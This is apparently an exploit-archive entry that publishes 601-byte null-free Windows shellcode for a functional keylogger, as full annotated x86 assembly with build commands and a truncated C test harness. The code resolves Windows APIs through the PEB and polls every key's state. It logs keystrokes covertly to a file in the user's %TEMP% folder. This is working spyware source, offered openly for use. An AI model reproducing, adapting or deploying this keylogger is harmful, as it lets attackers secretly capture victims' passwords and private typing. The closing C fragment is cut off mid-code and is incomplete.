All Windows Null-Free Shellcode - Functional Keylogger to File - 601 (0x0259) bytes

Author: Fugu Published: 2016-05-11 Verified: Verified



; Exploit Title: All windows null free shellcode - functional keylogger to file - 601 (0x0259) bytes
; Date: Sat May  7 19:32:08 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage:
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the users %TEMP% directory.
;       keystrokes are saved in format: "Virtual-Key Codes", from
; website
; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj
; |STACK| (at the main loop)
; 00000000 Location of bool array
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 V_
; KERNEL32.lstrcatA
; KERNEL32.Sleep
; KERNEL32.GetEnvironmentVariableA
; KERNEL32.CreateFileA
; KERNEL32.WriteFileA
; user32.GetKeyState
; user32.7EC00000
; KERNEL32.LoadLibraryA
; KERNEL32.GetModuleHandleA
; KERNEL32.GetProcAddress
; KERNEL32.7B410000
section .bss
section .data
section .text
   global _start
    cld                                 ; 00000000 FC
    xor edx,edx                             ; 00000001 31D2
    mov dl,0x30                             ; 00000003 B230
    push dword [fs:edx]                         ; 00000005 64FF32
    pop edx                                 ; 00000008 5A
    mov edx,[edx+0xc]                           ; 00000009 8B520C
    mov edx,[edx+0x14]                          ; 0000000C 8B5214
    mov esi,[edx+0x28]                          ; 0000000F 8B7228
    xor eax,eax                             ; 00000012 31C0
    mov ecx,eax                             ; 00000014 89C1
    mov cl,0x3                              ; 00000016 B103
    lodsb                               ; 00000018 AC
    rol eax,byte 0x8                            ; 00000019 C1C008
    lodsb                               ; 0000001C AC
    loop loc_18h                            ; 0000001D E2F9
    lodsb                               ; 0000001F AC
    cmp eax,0x4b45524e                          ; 00000020 3D4E52454B
    jz loc_2ch                              ; 00000025 7405
    cmp eax,0x6b65726e                          ; 00000027 3D6E72656B
    mov ebx,[edx+0x10]                          ; 0000002C 8B5A10
    mov edx,[edx]                           ; 0000002F 8B12
    jnz loc_fh                              ; 00000031 75DC
    mov edx,[ebx+0x3c]                          ; 00000033 8B533C
    add edx,ebx                             ; 00000036 01DA
    push dword [edx+0x34]                       ; 00000038 FF7234
    mov edx,[edx+0x78]                          ; 0000003B 8B5278
    add edx,ebx                             ; 0000003E 01DA
    mov esi,[edx+0x20]                          ; 00000040 8B7220
    add esi,ebx                             ; 00000043 01DE
    xor ecx,ecx                             ; 00000045 31C9
    inc ecx                                 ; 00000047 41
    lodsd                               ; 00000048 AD
    add eax,ebx                             ; 00000049 01D8
    cmp dword [eax],0x50746547                      ; 0000004B 813847657450
    jnz loc_47h                             ; 00000051 75F4
    cmp dword [eax+0x4],0x41636f72                      ; 00000053 817804726F6341
    jnz loc_47h                             ; 0000005A 75EB
    cmp dword [eax+0x8],0x65726464                      ; 0000005C 81780864647265
    jnz loc_47h                             ; 00000063 75E2
    dec ecx                                 ; 00000065 49
    mov esi,[edx+0x24]                          ; 00000066 8B7224
    add esi,ebx                             ; 00000069 01DE
    mov cx,[esi+ecx*2]                          ; 0000006B 668B0C4E
    mov esi,[edx+0x1c]                          ; 0000006F 8B721C
    add esi,ebx                             ; 00000072 01DE
    mov edx,[esi+ecx*4]                         ; 00000074 8B148E
    add edx,ebx                             ; 00000077 01DA
    mov edi,edx                             ; 00000079 89D7
    push edx                                ; 0000007B 52
    xor eax,eax                             ; 0000007C 31C0
    push eax                                ; 0000007E 50
    push dword 0x41656c64                       ; 0000007F 68646C6541
    push dword 0x6e614865                       ; 00000084 686548616E
    push dword 0x6c75646f                       ; 00000089 686F64756C
    push dword 0x4d746547                       ; 0000008E 684765744D
    push esp                                ; 00000093 54
    push ebx                                ; 00000094 53
    call edi                                ; 00000095 FFD7
    lea esp,[esp+0x14]                          ; 00000097 8D642414
    push eax                                ; 0000009B 50
    push dword 0x88014c4c                       ; 0000009C 684C4C0188
    dec byte [esp+0x2]                          ; 000000A1 FE4C2402
    push dword 0x442e3233                       ; 000000A5 6833322E44
    push dword 0x52455355                       ; 000000AA 6855534552
    push esp                                ; 000000AF 54
    call eax                                ; 000000B0 FFD0
    xor edx,edx                             ; 000000B2 31D2
    cmp eax,edx                             ; 000000B4 39D0
    jnz loc_f0h                             ; 000000B6 7538
    lea esp,[esp+0xc]                           ; 000000B8 8D64240C
    push edx                                ; 000000BC 52
    push dword 0x41797261                       ; 000000BD 6861727941
    push dword 0x7262694c                       ; 000000C2 684C696272
    push dword 0x64616f4c                       ; 000000C7 684C6F6164
    push esp                                ; 000000CC 54
    push ebx                                ; 000000CD 53
    call edi                                ; 000000CE FFD7
    lea esp,[esp+0x10]                          ; 000000D0 8D642410
    push eax                                ; 000000D4 50
    push dword 0x77014c4c                       ; 000000D5 684C4C0177
    dec byte [esp+0x2]                          ; 000000DA FE4C2402
    push dword 0x442e3233                       ; 000000DE 6833322E44
    push dword 0x52455355                       ; 000000E3 6855534552
    push esp                                ; 000000E8 54
    call eax                                ; 000000E9 FFD0
    lea esp,[esp+0xc]                           ; 000000EB 8D64240C
    push eax                                ; 000000EF 50
    mov edx,eax                             ; 000000F0 89C2
    push dword 0x1657461                        ; 000000F2 6861746501
    dec byte [esp+0x3]                          ; 000000F7 FE4C2403
    push dword 0x74537965                       ; 000000FB 6865795374
    push dword 0x4b746547                       ; 00000100 684765744B
    push esp                                ; 00000105 54
    push edx                                ; 00000106 52
    call edi                                ; 00000107 FFD7
    lea esp,[esp+0xc]                           ; 00000109 8D64240C
    push eax                                ; 0000010D 50
    push dword 0x55010165                       ; 0000010E 6865010155
    dec byte [esp+0x1]                          ; 00000113 FE4C2401
    push dword 0x6c694665                       ; 00000117 686546696C
    push dword 0x74697257                       ; 0000011C 6857726974
    push esp                                ; 00000121 54
    push ebx                                ; 00000122 53
    call edi                                ; 00000123 FFD7
    lea esp,[esp+0xc]                           ; 00000125 8D64240C
    push eax                                ; 00000129 50
    push dword 0x141656c                        ; 0000012A 686C654101
    dec byte [esp+0x3]                          ; 0000012F FE4C2403
    push dword 0x69466574                       ; 00000133 6874654669
    push dword 0x61657243                       ; 00000138 6843726561
    push esp                                ; 0000013D 54
    push ebx                                ; 0000013E 53
    call edi                                ; 0000013F FFD7
    lea esp,[esp+0xc]                           ; 00000141 8D64240C
    push eax                                ; 00000145 50
    push dword 0x141656c                        ; 00000146 686C654101
    dec byte [esp+0x3]                          ; 0000014B FE4C2403
    push dword 0x62616972                       ; 0000014F 6872696162
    push dword 0x6156746e                       ; 00000154 686E745661
    push dword 0x656d6e6f                       ; 00000159 686F6E6D65
    push dword 0x7269766e                       ; 0000015E 686E766972
    push dword 0x45746547                       ; 00000163 6847657445
    push esp                                ; 00000168 54
    push ebx                                ; 00000169 53
    call edi                                ; 0000016A FFD7
    lea esp,[esp+0x18]                          ; 0000016C 8D642418
    push eax                                ; 00000170 50
    push byte +0x70                             ; 00000171 6A70
    push dword 0x65656c53                       ; 00000173 68536C6565
    push esp                                ; 00000178 54
    push ebx                                ; 00000179 53
    call edi                                ; 0000017A FFD7
    lea esp,[esp+0x8]                           ; 0000017C 8D642408
    push eax                                ; 00000180 50
    push edx                                ; 00000181 52
    push dword 0x41746163                       ; 00000182 6863617441
    push dword 0x7274736c                       ; 00000187 686C737472
    push esp                                ; 0000018C 54
    push ebx                                ; 0000018D 53
    call edi                                ; 0000018E FFD7
    lea esp,[esp+0xc]                           ; 00000190 8D64240C
    push eax                                ; 00000194 50
    xor ecx,ecx                             ; 00000195 31C9
    mov cl,0xe                              ; 00000197 B10E
    push ecx                                ; 00000199 51
    loop loc_199h                           ; 0000019A E2FD
    push ecx                                ; 0000019C 51
    push dword 0x504d4554                       ; 0000019D 6854454D50
    mov ecx,esp                             ; 000001A2 89E1
    push byte +0x40                             ; 000001A4 6A40
    push ecx                                ; 000001A6 51
    push ecx                                ; 000001A7 51
    call dword [esp+0x54]                       ; 000001A8 FF542454
    mov edx,esp                             ; 000001AC 89E2
    push byte +0x1                              ; 000001AE 6A01
    dec byte [esp]                              ; 000001B0 FE0C24
    push dword 0x6e69622e                       ; 000001B3 682E62696E
    push dword 0x676f6c5c                       ; 000001B8 685C6C6F67
    mov ecx,esp                             ; 000001BD 89E1
    push ecx                                ; 000001BF 51
    push edx                                ; 000001C0 52
    call dword [esp+0x54]                       ; 000001C1 FF542454
    xor ecx,ecx                             ; 000001C5 31C9
    push ecx                                ; 000001C7 51
    push ecx                                ; 000001C8 51
    add byte [esp],0x80                         ; 000001C9 80042480
    push byte +0x4                              ; 000001CD 6A04
    push ecx                                ; 000001CF 51
    push byte +0x2                              ; 000001D0 6A02
    push ecx                                ; 000001D2 51
    add byte [esp],0x4                          ; 000001D3 80042404
    push eax                                ; 000001D7 50
    call dword [esp+0x74]                       ; 000001D8 FF542474
    lea esp,[esp+0x4c]                          ; 000001DC 8D64244C
    push eax                                ; 000001E0 50
    xor ecx,ecx                             ; 000001E1 31C9
    mov esi,ecx                             ; 000001E3 89CE
    mov cl,0x8                              ; 000001E5 B108
    push esi                                ; 000001E7 56
    loop loc_1e7h                           ; 000001E8 E2FD
;main loop
    xor ecx,ecx                             ; 000001EA 31C9
    xor esi,esi                             ; 000001EC 31F6
    push byte +0x8                              ; 000001EE 6A08
    call dword [esp+0x2c]                       ; 000001F0 FF54242C
    mov eax,esi                             ; 000001F4 89F0
    cmp al,0xff                             ; 000001F6 3CFF
    jnc loc_1eah                            ; 000001F8 73F0
    inc esi                                 ; 000001FA 46
    push esi                                ; 000001FB 56
    call dword [esp+0x3c]                       ; 000001FC FF54243C
    mov edx,esi                             ; 00000200 89F2
    xor ecx,ecx                             ; 00000202 31C9
    mov cl,0x80                             ; 00000204 B180
    and eax,ecx                             ; 00000206 21C8
    xor ecx,ecx                             ; 00000208 31C9
    cmp eax,ecx                             ; 0000020A 39C8
    jnz loc_21eh                            ; 0000020C 7510
;GetKeyState false
;set bool array index zero
    xor edx,edx                             ; 0000020E 31D2
    mov ecx,edx                             ; 00000210 89D1
    mov eax,esi                             ; 00000212 89F0
    mov cl,0x20                             ; 00000214 B120
    div ecx                                 ; 00000216 F7F1
    btr [esp+eax*4],edx                         ; 00000218 0FB31484
    jmp short loc_1f4h                          ; 0000021C EBD6
;GetKeyState true
;check bool array
;if bool true, skip
;if bool false, set bool true, write to file
    xor edx,edx                             ; 0000021E 31D2
    mov ecx,edx                             ; 00000220 89D1
    mov eax,esi                             ; 00000222 89F0
    mov cl,0x20                             ; 00000224 B120
    div ecx                                 ; 00000226 F7F1
    bt [esp+eax*4],edx                          ; 00000228 0FA31484
    jc loc_1f4h                             ; 0000022C 72C6
    xor edx,edx                             ; 0000022E 31D2
    mov ecx,edx                             ; 00000230 89D1
    mov eax,esi                             ; 00000232 89F0
    mov cl,0x20                             ; 00000234 B120
    div ecx                                 ; 00000236 F7F1
    bts [esp+eax*4],edx                         ; 00000238 0FAB1484
    xor ecx,ecx                             ; 0000023C 31C9
    push esi                                ; 0000023E 56
    push ecx                                ; 0000023F 51
    lea ecx,[esp]                           ; 00000240 8D0C24
    push ecx                                ; 00000243 51
    push byte +0x1                              ; 00000244 6A01
    lea ecx,[esp+0xc]                           ; 00000246 8D4C240C
    push ecx                                ; 0000024A 51
    push dword [esp+0x34]                       ; 0000024B FF742434
    call dword [esp+0x4c]                       ; 0000024F FF54244C
    lea esp,[esp+0x4]                           ; 00000253 8D642404
    jmp short loc_1eah                          ; 00000257 EB91
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
int main(int argc, char *argv[]){
    printf("Shellcode length: %d\n", (int)strlen(sc));
    return 0;